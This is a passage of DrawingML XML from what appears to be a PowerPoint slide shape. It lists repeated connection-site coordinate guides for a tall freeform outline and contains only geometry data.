              <a:gd name="connsiteY52" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 479689 w 1596604"/>
              <a:gd name="connsiteY53" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 477147 w 1596604"/>
              <a:gd name="connsiteY54" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 478140 w 1596604"/>
              <a:gd name="connsiteY55" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 451124 w 1596604"/>
              <a:gd name="connsiteY56" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 427681 w 1596604"/>
              <a:gd name="connsiteY57" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 381480 w 1596604"/>
              <a:gd name="connsiteY58" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 352917 w 1596604"/>
              <a:gd name="connsiteY59" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 333712 w 1596604"/>
              <a:gd name="connsiteY60" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 339534 w 1596604"/>
              <a:gd name="connsiteY61" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 333926 w 1596604"/>
              <a:gd name="connsiteY62" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 339799 w 1596604"/>
              <a:gd name="connsiteY63" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 321387 w 1596604"/>
              <a:gd name="connsiteY64" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 310123 w 1596604"/>
              <a:gd name="connsiteY65" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 306444 w 1596604"/>
              <a:gd name="connsiteY66" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 266582 w 1596604"/>
              <a:gd name="connsiteY67" fmla="*/ 711705 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 193734 w 1596604"/>
              <a:gd name="connsiteY68" fmla="*/ 604703 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 160542 w 1596604"/>
              <a:gd name="connsiteY69" fmla="*/ 455299 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 137049 w 1596604"/>
              <a:gd name="connsiteY70" fmla="*/ 224344 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 170222 w 1596604"/>
              <a:gd name="connsiteY71" fmla="*/ 74954 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 0 w 1596604"/>
              <a:gd name="connsiteY72" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1596604"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1596604 w 1596604"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1596604 w 1596604"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 333298 w 1596604"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 369891 w 1596604"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 381391 w 1596604"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 398798 w 1596604"/>
              <a:gd name="connsiteY6" fmla="*/ 6686827 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 410376 w 1596604"/>
              <a:gd name="connsiteY7" fmla="*/ 6633777 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 483219 w 1596604"/>
              <a:gd name="connsiteY8" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 498906 w 1596604"/>
              <a:gd name="connsiteY9" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 517746 w 1596604"/>
              <a:gd name="connsiteY10" fmla="*/ 6294334 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 505520 w 1596604"/>
              <a:gd name="connsiteY11" fmla="*/ 6231403 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 498178 w 1596604"/>
              <a:gd name="connsiteY12" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 496976 w 1596604"/>
              <a:gd name="connsiteY13" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 504561 w 1596604"/>
              <a:gd name="connsiteY14" fmla="*/ 5905303 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 534519 w 1596604"/>
              <a:gd name="connsiteY15" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 564317 w 1596604"/>
              <a:gd name="connsiteY16" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 578329 w 1596604"/>
              <a:gd name="connsiteY17" fmla="*/ 5553910 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 602760 w 1596604"/>
              <a:gd name="connsiteY18" fmla="*/ 5449031 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 639643 w 1596604"/>
              <a:gd name="connsiteY19" fmla="*/ 5341916 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 678024 w 1596604"/>
              <a:gd name="connsiteY20" fmla="*/ 5264214 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 684183 w 1596604"/>
              <a:gd name="connsiteY21" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 692465 w 1596604"/>
              <a:gd name="connsiteY22" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 696075 w 1596604"/>
              <a:gd name="connsiteY23" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 709941 w 1596604"/>
              <a:gd name="connsiteY24" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 712672 w 1596604"/>
              <a:gd name="connsiteY25" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 710930 w 1596604"/>
              <a:gd name="connsiteY26" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 717839 w 1596604"/>
              <a:gd name="connsiteY27" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 729098 w 1596604"/>
              <a:gd name="connsiteY28" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 735001 w 1596604"/>
              <a:gd name="connsiteY29" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 734314 w 1596604"/>
              <a:gd name="connsiteY30" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 725962 w 1596604"/>
              <a:gd name="connsiteY31" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 706615 w 1596604"/>
              <a:gd name="connsiteY32" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 708244 w 1596604"/>
              <a:gd name="connsiteY33" fmla="*/ 4076008 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 695944 w 1596604"/>
              <a:gd name="connsiteY34" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 695669 w 1596604"/>
              <a:gd name="connsiteY35" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 699968 w 1596604"/>
              <a:gd name="connsiteY36" fmla="*/ 3872886 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 710341 w 1596604"/>
              <a:gd name="connsiteY37" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 721237 w 1596604"/>
              <a:gd name="connsiteY38" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 728583 w 1596604"/>
              <a:gd name="connsiteY39" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 727879 w 1596604"/>
              <a:gd name="connsiteY40" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 731322 w 1596604"/>
              <a:gd name="connsiteY41" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 752752 w 1596604"/>
              <a:gd name="connsiteY42" fmla="*/ 3295862 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 735278 w 1596604"/>
              <a:gd name="connsiteY43" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 710686 w 1596604"/>
              <a:gd name="connsiteY44" fmla="*/ 3112365 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 696161 w 1596604"/>
              <a:gd name="connsiteY45" fmla="*/ 3072935 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 671335 w 1596604"/>
              <a:gd name="connsiteY46" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 628615 w 1596604"/>
              <a:gd name="connsiteY47" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 562867 w 1596604"/>
              <a:gd name="connsiteY48" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 533684 w 1596604"/>
              <a:gd name="connsiteY49" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 537754 w 1596604"/>
              <a:gd name="connsiteY50" fmla="*/ 2423438 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 505585 w 1596604"/>
              <a:gd name="connsiteY51" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 495472 w 1596604"/>
              <a:gd name="connsiteY52" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 479689 w 1596604"/>
              <a:gd name="connsiteY53" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 477147 w 1596604"/>
              <a:gd name="connsiteY54" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 478140 w 1596604"/>
              <a:gd name="connsiteY55" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 451124 w 1596604"/>
              <a:gd name="connsiteY56" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 427681 w 1596604"/>
              <a:gd name="connsiteY57" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 381480 w 1596604"/>
              <a:gd name="connsiteY58" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 352917 w 1596604"/>
              <a:gd name="connsiteY59" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 333712 w 1596604"/>
              <a:gd name="connsiteY60" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 339534 w 1596604"/>
              <a:gd name="connsiteY61" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 333926 w 1596604"/>
              <a:gd name="connsiteY62" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 339799 w 1596604"/>
              <a:gd name="connsiteY63" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 321387 w 1596604"/>
              <a:gd name="connsiteY64" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 310123 w 1596604"/>
              <a:gd name="connsiteY65" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 306444 w 1596604"/>
              <a:gd name="connsiteY66" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 266582 w 1596604"/>
              <a:gd name="connsiteY67" fmla="*/ 711705 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 193734 w 1596604"/>
              <a:gd name="connsiteY68" fmla="*/ 604703 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 160542 w 1596604"/>
              <a:gd name="connsiteY69" fmla="*/ 455299 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 137049 w 1596604"/>
              <a:gd name="connsiteY70" fmla="*/ 224344 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 65666 w 1596604"/>
              <a:gd name="connsiteY71" fmla="*/ 79063 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 0 w 1596604"/>
              <a:gd name="connsiteY72" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1596604"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1596604 w 1596604"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1596604 w 1596604"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 333298 w 1596604"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 369891 w 1596604"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 381391 w 1596604"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 398798 w 1596604"/>
              <a:gd name="connsiteY6" fmla="*/ 6686827 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 410376 w 1596604"/>
              <a:gd name="connsiteY7" fmla="*/ 6633777 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 483219 w 1596604"/>
              <a:gd name="connsiteY8" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 498906 w 1596604"/>
              <a:gd name="connsiteY9" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 517746 w 1596604"/>
              <a:gd name="connsiteY10" fmla="*/ 6294334 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 505520 w 1596604"/>
              <a:gd name="connsiteY11" fmla="*/ 6231403 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 498178 w 1596604"/>
              <a:gd name="connsiteY12" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 496976 w 1596604"/>
              <a:gd name="connsiteY13" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 504561 w 1596604"/>
              <a:gd name="connsiteY14" fmla="*/ 5905303 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 534519 w 1596604"/>
              <a:gd name="connsiteY15" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 564317 w 1596604"/>
              <a:gd name="connsiteY16" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 578329 w 1596604"/>
              <a:gd name="connsiteY17" fmla="*/ 5553910 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 602760 w 1596604"/>
              <a:gd name="connsiteY18" fmla="*/ 5449031 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 639643 w 1596604"/>
              <a:gd name="connsiteY19" fmla="*/ 5341916 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 678024 w 1596604"/>
              <a:gd name="connsiteY20" fmla="*/ 5264214 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 684183 w 1596604"/>
              <a:gd name="connsiteY21" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 692465 w 1596604"/>
              <a:gd name="connsiteY22" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 696075 w 1596604"/>
              <a:gd name="connsiteY23" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 709941 w 1596604"/>
              <a:gd name="connsiteY24" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 712672 w 1596604"/>
              <a:gd name="connsiteY25" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 710930 w 1596604"/>
              <a:gd name="connsiteY26" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 717839 w 1596604"/>
              <a:gd name="connsiteY27" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 729098 w 1596604"/>
              <a:gd name="connsiteY28" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 735001 w 1596604"/>
              <a:gd name="connsiteY29" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 734314 w 1596604"/>
              <a:gd name="connsiteY30" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 725962 w 1596604"/>
              <a:gd name="connsiteY31" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 706615 w 1596604"/>
              <a:gd name="connsiteY32" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 708244 w 1596604"/>
              <a:gd name="connsiteY33" fmla="*/ 4076008 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 695944 w 1596604"/>
              <a:gd name="connsiteY34" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 695669 w 1596604"/>
              <a:gd name="connsiteY35" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 699968 w 1596604"/>
              <a:gd name="connsiteY36" fmla="*/ 3872886 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 710341 w 1596604"/>
              <a:gd name="connsiteY37" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 721237 w 1596604"/>
              <a:gd name="connsiteY38" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 728583 w 1596604"/>
              <a:gd name="connsiteY39" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 727879 w 1596604"/>
              <a:gd name="connsiteY40" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 731322 w 1596604"/>
              <a:gd name="connsiteY41" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 752752 w 1596604"/>
              <a:gd name="connsiteY42" fmla="*/ 3295862 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 735278 w 1596604"/>
              <a:gd name="connsiteY43" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 710686 w 1596604"/>
              <a:gd name="connsiteY44" fmla="*/ 3112365 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 696161 w 1596604"/>
              <a:gd name="connsiteY45" fmla="*/ 3072935 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 671335 w 1596604"/>
              <a:gd name="connsiteY46" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 628615 w 1596604"/>
              <a:gd name="connsiteY47" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 562867 w 1596604"/>
              <a:gd name="connsiteY48" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 533684 w 1596604"/>
              <a:gd name="connsiteY49" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 537754 w 1596604"/>
              <a:gd name="connsiteY50" fmla="*/ 2423438 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 505585 w 1596604"/>
              <a:gd name="connsiteY51" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 495472 w 1596604"/>
              <a:gd name="connsiteY52" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 479689 w 1596604"/>
              <a:gd name="connsiteY53" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 477147 w 1596604"/>
              <a:gd name="connsiteY54" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 478140 w 1596604"/>
              <a:gd name="connsiteY55" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 451124 w 1596604"/>
              <a:gd name="connsiteY56" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 427681 w 1596604"/>
              <a:gd name="connsiteY57" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 381480 w 1596604"/>
              <a:gd name="connsiteY58" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 352917 w 1596604"/>
              <a:gd name="connsiteY59" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 333712 w 1596604"/>
              <a:gd name="connsiteY60" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 339534 w 1596604"/>
              <a:gd name="connsiteY61" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 333926 w 1596604"/>
              <a:gd name="connsiteY62" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 339799 w 1596604"/>
              <a:gd name="connsiteY63" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 321387 w 1596604"/>
              <a:gd name="connsiteY64" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 310123 w 1596604"/>
              <a:gd name="connsiteY65" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 306444 w 1596604"/>
              <a:gd name="connsiteY66" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 266582 w 1596604"/>
              <a:gd name="connsiteY67" fmla="*/ 711705 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 193734 w 1596604"/>
              <a:gd name="connsiteY68" fmla="*/ 604703 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 160542 w 1596604"/>
              <a:gd name="connsiteY69" fmla="*/ 455299 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 106694 w 1596604"/>
              <a:gd name="connsiteY70" fmla="*/ 232564 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 65666 w 1596604"/>
              <a:gd name="connsiteY71" fmla="*/ 79063 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 0 w 1596604"/>
              <a:gd name="connsiteY72" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1596604"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1596604 w 1596604"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1596604 w 1596604"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 333298 w 1596604"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 369891 w 1596604"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 381391 w 1596604"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 398798 w 1596604"/>
              <a:gd name="connsiteY6" fmla="*/ 6686827 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 410376 w 1596604"/>
              <a:gd name="connsiteY7" fmla="*/ 6633777 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 483219 w 1596604"/>
              <a:gd name="connsiteY8" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 498906 w 1596604"/>
              <a:gd name="connsiteY9" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 517746 w 1596604"/>
              <a:gd name="connsiteY10" fmla="*/ 6294334 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 505520 w 1596604"/>
              <a:gd name="connsiteY11" fmla="*/ 6231403 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 498178 w 1596604"/>
              <a:gd name="connsiteY12" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 496976 w 1596604"/>
              <a:gd name="connsiteY13" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 504561 w 1596604"/>
              <a:gd name="connsiteY14" fmla="*/ 5905303 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 534519 w 1596604"/>
              <a:gd name="connsiteY15" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 564317 w 1596604"/>
              <a:gd name="connsiteY16" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 578329 w 1596604"/>
              <a:gd name="connsiteY17" fmla="*/ 5553910 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 602760 w 1596604"/>
              <a:gd name="connsiteY18" fmla="*/ 5449031 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 639643 w 1596604"/>
              <a:gd name="connsiteY19" fmla="*/ 5341916 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 678024 w 1596604"/>
              <a:gd name="connsiteY20" fmla="*/ 5264214 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 684183 w 1596604"/>
              <a:gd name="connsiteY21" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 692465 w 1596604"/>
              <a:gd name="connsiteY22" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 696075 w 1596604"/>
              <a:gd name="connsiteY23" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 709941 w 1596604"/>
              <a:gd name="connsiteY24" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 712672 w 1596604"/>
              <a:gd name="connsiteY25" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 710930 w 1596604"/>
              <a:gd name="connsiteY26" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 717839 w 1596604"/>
              <a:gd name="connsiteY27" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 729098 w 1596604"/>
              <a:gd name="connsiteY28" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 735001 w 1596604"/>
              <a:gd name="connsiteY29" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 734314 w 1596604"/>
              <a:gd name="connsiteY30" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 725962 w 1596604"/>
              <a:gd name="connsiteY31" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 706615 w 1596604"/>
              <a:gd name="connsiteY32" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 708244 w 1596604"/>
              <a:gd name="connsiteY33" fmla="*/ 4076008 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 695944 w 1596604"/>
              <a:gd name="connsiteY34" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 695669 w 1596604"/>
              <a:gd name="connsiteY35" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 699968 w 1596604"/>
              <a:gd name="connsiteY36" fmla="*/ 3872886 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 710341 w 1596604"/>
              <a:gd name="connsiteY37" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 721237 w 1596604"/>
              <a:gd name="connsiteY38" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 728583 w 1596604"/>
              <a:gd name="connsiteY39" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 727879 w 1596604"/>
              <a:gd name="connsiteY40" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 731322 w 1596604"/>
              <a:gd name="connsiteY41" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 752752 w 1596604"/>
              <a:gd name="connsiteY42" fmla="*/ 3295862 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 735278 w 1596604"/>
              <a:gd name="connsiteY43" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 710686 w 1596604"/>
              <a:gd name="connsiteY44" fmla="*/ 3112365 h 6858000"/>
